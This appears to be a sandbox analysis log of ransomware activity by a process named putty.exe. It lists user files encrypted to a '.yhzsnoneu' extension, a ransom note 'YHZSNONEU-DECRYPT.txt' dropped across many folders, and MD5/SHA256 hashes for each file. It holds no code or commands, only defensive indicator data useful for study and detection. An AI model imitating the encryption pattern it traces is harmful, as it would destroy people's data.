C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\HPSK10OB\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\9RI45C46\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\index.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms.yhzsnoneu
binary
MD5: 7417690c7b427a7f8e5199229c134227
SHA256: cb7d69f29443a7fb8b7e1d941da00bad312c83bf41f1da9b53df7be11923062d
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms.yhzsnoneu
binary
MD5: 72339396a08742487c673cac3dbed09e
SHA256: 8ef4e4261c26cbaad1d682e940229c034d954c0a34e688b22577e6cd303d0c0d
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms.yhzsnoneu
binary
MD5: 9633f929572da50ba11243567e126ac8
SHA256: e691d95196062e88a9fb78caa6ffd2e4be0286b2b774f98287d33e16012d660b
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms.yhzsnoneu
binary
MD5: 00fac4e6836fc2b38bab984f79277051
SHA256: bbb2913627b1d25e8d35603747bdbc3a97be4176dbe0438830903f1ff77f25b5
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\Popular Government Questions from USA~dgov~.feed-ms.yhzsnoneu
binary
MD5: 2566a81087c30201ea68379eb541cbe0
SHA256: b39a3c6d1abe9940313fdc0fc2a59c7e84dcec7467301be5ec2786ad46acf6e9
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\USA~dgov Updates~c News and Features~.feed-ms.yhzsnoneu
binary
MD5: 2292ac4997840e9df33ad1899270b36f
SHA256: 956ee6292c5cbe6c705297092fca4cc3b56c069a5d6caca155f2aed5ae781e0d
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\Popular Government Questions from USA~dgov~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\USA~dgov Updates~c News and Features~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.yhzsnoneu
binary
MD5: ca90d987ed0621af5cba09157eb7e997
SHA256: a845b638822d0389a143d4045a5b415a229c02f118f2bba11407c201a2bd9ddb
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Credentials\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.yhzsnoneu
binary
MD5: fad4d28aca6403d51c4a4fd0c513a1be
SHA256: 52b046ca1dbdbb331828dfdd2a899cf022893b6d626b4fea24b165b2de12549d
3020
putty.exe
C:\Users\admin\Saved Games\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Pictures\referencecart.png.yhzsnoneu
binary
MD5: 7d512164830899d42a03b8ebd63496e1
SHA256: e934d90e593ece59cf52a44e4c79ca7d4b9188e02dd7e534dbf0bfd34c3c2d01
3020
putty.exe
C:\Users\admin\Pictures\statesuses.png.yhzsnoneu
binary
MD5: 3b85fac94e4ae84dc406ada5ed7cfd7b
SHA256: ff83b8df4e04b1244fa3d957b26d42e89264adb32faaf76a7a2583b9bda64acb
3020
putty.exe
C:\Users\admin\Searches\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Pictures\statesuses.png
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Pictures\letdriver.png.yhzsnoneu
binary
MD5: f681ea930916380864b5abc52959ec74
SHA256: 354b02ae477ebc3ea9cdef3687f8518241f59501c14755b469af919fa003ca50
3020
putty.exe
C:\Users\admin\Pictures\perfectest.jpg.yhzsnoneu
binary
MD5: 1a30b607f988d5984afe9c26e17a9f32
SHA256: b372e7671738981b855b03f1c1d2ab8ac233a2a308f951ca9aae78655a9e8dde
3020
putty.exe
C:\Users\admin\Pictures\incomeaccounts.jpg.yhzsnoneu
binary
MD5: 759194fb7ba06f700a503c0634bd5101
SHA256: 61f7c2d1d7d82f8513c31ebdb7ed80c587a6ce89ebf0d77ceaaf5da7dd2c6b9a
3020
putty.exe
C:\Users\admin\ntuser.ini.yhzsnoneu
binary
MD5: 526ab8f9727d3b648a92eebd86746a0b
SHA256: 9b92dd53f3c13d2613b8fdc0280e6689af6ffcf781e5ad334a2ce88ce8de601a
3020
putty.exe
C:\Users\admin\Pictures\perfectest.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Pictures\referencecart.png
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Pictures\letdriver.png
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Pictures\incomeaccounts.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\ntuser.ini
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.yhzsnoneu
bs
MD5: 475cd26a62cd584464b49fe65b51e75a
SHA256: 55aa64ec35d4de69016567793b86b02f737d934db9cfa66dd01994ff9a6f8f93
3020
putty.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.yhzsnoneu
binary
MD5: 79126495d9bdeb6891ef1ab8e43499f7
SHA256: a01a05c948e106b97fe0826fa30a59bd92a4e50b54d0f77569aa362ad454487b
3020
putty.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.yhzsnoneu
binary
MD5: 253ac64edde27095a85d19775355b164
SHA256: a7fee70af0de3775d2a02d2f2edffe4bc8ba62cc07fb3b8bb38b8eeb9ac36189
3020
putty.exe
C:\Users\admin\Links\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.yhzsnoneu
binary
MD5: 89c3738138d7570596cd0cfac919a018
SHA256: dd9c306eb43a9e5070833013c0b9f8486e0e277cb65e9de8a3a60b67ecf5850d
3020
putty.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.yhzsnoneu
binary
MD5: c6caa1cfebb4056c0a2a77a07559a796
SHA256: f42f3b62ab742c920233441909364cfaf635a587df38fbfc27df9a0d42372646
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url.yhzsnoneu
binary
MD5: 43b1807c2cbada79968c95a91bf6bd31
SHA256: 4f1efeb461e40ef86763b924af0842a83bbe5bb400a7153804fa8163fdf33d8b
3020
putty.exe
C:\Users\admin\Favorites\Windows Live\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url.yhzsnoneu
binary
MD5: 01cf9ad5bbad302a1192b5c567dc6c00
SHA256: bf939d4b2b586654fb8c827259061fdcd23b01e811a7a50b6c2db1afee182c20
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.yhzsnoneu
binary
MD5: 3ee638fb1599552d4637d6ebaae3d2cc
SHA256: 070f7e495669e651c9cee4580285cd9b725cea347b77786fadbd588d3c010461
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.yhzsnoneu
binary
MD5: 22c40bf0abfb2e033cf8314613624766
SHA256: 3d434de6969c0d81ccdab2fb4d31f4e5a04b593b1b064d102cbbf7b504948766
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.yhzsnoneu
binary
MD5: 835afb5eb60802bb471968e34a439999
SHA256: 9f9b193ec6e80765d89c1a00101ed2c3014c84af6a6e37560cfc3acf45f769de
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.yhzsnoneu
binary
MD5: 56117893e56be8fd2a6572621381cd57
SHA256: 966929e1d6847cf17d9dfc9b67a0bc255a04fbc877e1dd70a9ec89b2844f2292
3020
putty.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.yhzsnoneu
binary
MD5: a3f349c33946b68dc5fcf2112eb73c41
SHA256: 41a76df9128c3f3cad6a5fd8f03fccc049ffaf1b03adc04c6a0e7d1f04e4c893
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.yhzsnoneu
binary
MD5: 7193de05802bb5333a3cd885fda99e0a
SHA256: 2381087b380c08830ee4eafa8b32972094bcafd29b591a2827a08120f4a7869a
3020
putty.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.yhzsnoneu
binary
MD5: c944b647deb9069c5c01ac3e09e24b6d
SHA256: b84301496e0f7ae97a71287f4da556bf5fe0c4b251950fe492894fde39502a89
3020
putty.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.yhzsnoneu
binary
MD5: 04b9e73ceddfd154398e6a1b09b4ed53
SHA256: 52e93f93aa5a1a685f3c7d1ea47a186d0a6d7697ef1e3969362cecd8cd14026b
3020
putty.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url.yhzsnoneu
binary
MD5: e071215db4a24a6a02636aec3abd41eb
SHA256: 5016982c26c9f45a3a41c0446d77d16fda05ea94d456039d7111cded5c6a3f50
3020
putty.exe
C:\Users\admin\Favorites\Links for United States\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Favorites\Microsoft Websites\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.yhzsnoneu
binary
MD5: 8949d6e540fcd80648efde9f883d132e
SHA256: 162090c1afe8807b904dc4db427c8dd7f247991eba4f17f4a5439edcedce1d6f
3020
putty.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url.yhzsnoneu
binary
MD5: 65e0c2a015b6ab70be46ab95278881ec
SHA256: 22be98f9b8dec3a0c1c526626c48ed928871340538d3c31e6157990a80c5d329
3020
putty.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url.yhzsnoneu
binary
MD5: 372fe099e41c238357eda9a4bb83286f
SHA256: ff509408244e9c89b12b0364006a58ec589c51c767792b56667782a9beb956c7
3020
putty.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Links\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Downloads\seemsdriver.png.yhzsnoneu
binary
MD5: 186d4e13905b03f64333a68762ff2933
SHA256: 65e49b5f632ac5c55ae84112f3c74cf8f9c87daba01dfed53fb2f936e6a5c9d2
3020
putty.exe
C:\Users\admin\Favorites\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Downloads\storesbusiness.jpg.yhzsnoneu
binary
MD5: d2ccc6a6eb3d550c4e555771331b68ee
SHA256: 1060d82b24c2f9553f662e76de1235085c995c07c49f09ccf852bebe4523dae0
3020
putty.exe
C:\Users\admin\Downloads\storesbusiness.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Downloads\seemsdriver.png
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Downloads\clicku.jpg.yhzsnoneu
binary
MD5: 30855a62ac27f752cdb6acb2ccba8d03
SHA256: b8137868c82371e105b1dd0666cd774480f46b5886380b48b85c83441b86fc6b
3020
putty.exe
C:\Users\admin\Documents\workfunctions.rtf.yhzsnoneu
binary
MD5: 31e36c0f890e8710cf219d5e2cce6a0d
SHA256: bcfe324321276e16cfae307a9ae91240cc7e870a14a3dd46521decb3479433dc
3020
putty.exe
C:\Users\admin\Downloads\optionalc.jpg.yhzsnoneu
binary
MD5: acec3daf3d417103bcdf5af5d1b12674
SHA256: e7984575fe73b9e2b676f18fb5ac861e4708bb709cd5363a44930bcc82466a56
3020
putty.exe
C:\Users\admin\Downloads\downloadshardware.png.yhzsnoneu
binary
MD5: 1f3c8a4cd59d05c51a187632513d45fa
SHA256: da17bb08acb5508f3a79c77f63864934d63c2db796545a899f1a42ca24b884dd
3020
putty.exe
C:\Users\admin\Documents\probablyconnection.rtf.yhzsnoneu
binary
MD5: d17aa538ad02410d25232488699f96b8
SHA256: 1530a027a29a1d1101d21ad51dcf8d1387648c5d40d08e0affd71ff68c65fb04
3020
putty.exe
C:\Users\admin\Downloads\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Downloads\clicku.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\probablyconnection.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\workfunctions.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Downloads\downloadshardware.png
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Downloads\optionalc.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\particularlynon.rtf.yhzsnoneu
binary
MD5: 10a464a8f7d58d6697cbf2003084f257
SHA256: c0dd11b13148fac195d4f455e969e3142a20670380d2bf64405d3154ec61daa3
3020
putty.exe
C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp.yhzsnoneu
binary
MD5: 77a9290c38f9b9178eed5754a561c8f0
SHA256: d24d16f8c139cfb8f94626ea1f27746da116c88e78a6c77cbe70a35891b98171
3020
putty.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst.yhzsnoneu
binary
MD5: 0c40756ef83483c4715190553aa3a17d
SHA256: 7d6e12e51f0f99a7aaaf0fd4cc6efa291a9766e78036dfbafbd18ff9dcc7b406
3020
putty.exe
C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\particularlynon.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.yhzsnoneu
binary
MD5: 73fbe0d842323a109a7abd75d72dd628
SHA256: 79f94d5756df2a5fddcc26193899b091d761db0e537bc7ff0ebeffbcd27ba56a
3020
putty.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.yhzsnoneu
binary
MD5: 0278adaad7b7ff8da5a022d447b2bb64
SHA256: 73478683f8211d96925ef469e72ac62764d60e102036a417359d67e54f77654f
3020
putty.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\Outlook Files\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
binary
MD5: ace2bf05ede499f71b2a77f3879249cf
SHA256: 51d6e3de4904dd0a585e5c965c8609221ef710a6bb9bc5495c021e60740c4d3c
3020
putty.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.yhzsnoneu
binary
MD5: 21e6e11fd2c06681a32ba59c6ff6b1d7
SHA256: 9179e7135241395430ef7823c6b3ea3d906a93446a8a56e125633ae0ed02b755
3020
putty.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.yhzsnoneu
binary
MD5: be79ce0cee2d3a3de7270b0f9b312d21
SHA256: bf5147b098c9ae4da39208af48905574cd273dc52f3b52dc9f2d7e4f82c2a26b
3020
putty.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.yhzsnoneu
binary
MD5: 733e4b4c18956bf37a714c8669b1faf8
SHA256: a01034e3c0365b27d98a7db58581af9193862248f42865f801ff151ace52e772
3020
putty.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Pictures\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Documents\nakedsearch.rtf.yhzsnoneu
binary
MD5: bbfb6892ea57ef5a7cdae5023bd5802e
SHA256: 14ab6edb0bd3c04c65abe5300206b25ae918ccc0fab0b42fe88a75d11256d1df
3020
putty.exe
C:\Users\admin\Documents\OneNote Notebooks\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Videos\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Music\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Documents\nakedsearch.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Documents\livesuntil.rtf.yhzsnoneu
binary
MD5: 5b5d07613c7fcef7f66aa4e6be2c05ff
SHA256: 69e0f6297388172db437d65da24408c718d3e640fe0bdcccfd0bfe2e908d783c
3020
putty.exe
C:\Users\admin\Documents\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Desktop\~$ergеnсyexitmар.doc.yhzsnoneu
binary
MD5: d3727cedcfd5f98d3af5fb3f76469e1c
SHA256: 024ed53c2e0b13ad40d38e1e0922641a3223e51a5d067061efd7b7a58eec37e2
3020
putty.exe
C:\Users\admin\Documents\livesuntil.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\~$ergеnсyexitmар.doc
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\typelife.png.yhzsnoneu
vc
MD5: 264fdf8dd9d113dfae67bbdba6576962
SHA256: 54b91a69a754bf1fe35c59ff1e5fe15cbc133b122cc7e980b7af137472bb5983
3020
putty.exe
C:\Users\admin\Desktop\wherefew.rtf.yhzsnoneu
binary
MD5: 39b1107b40c07636d7aefaf84ae90676
SHA256: 5adb84412fc76c847bffe807d6b8530ddf40cc79966de8da65a8bc5bdb2fa2e8
3020
putty.exe
C:\Users\admin\Desktop\typelife.png
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\wherefew.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\thuleading.png.yhzsnoneu
binary
MD5: 96a20ccdecc78f35d70693e8effd1017
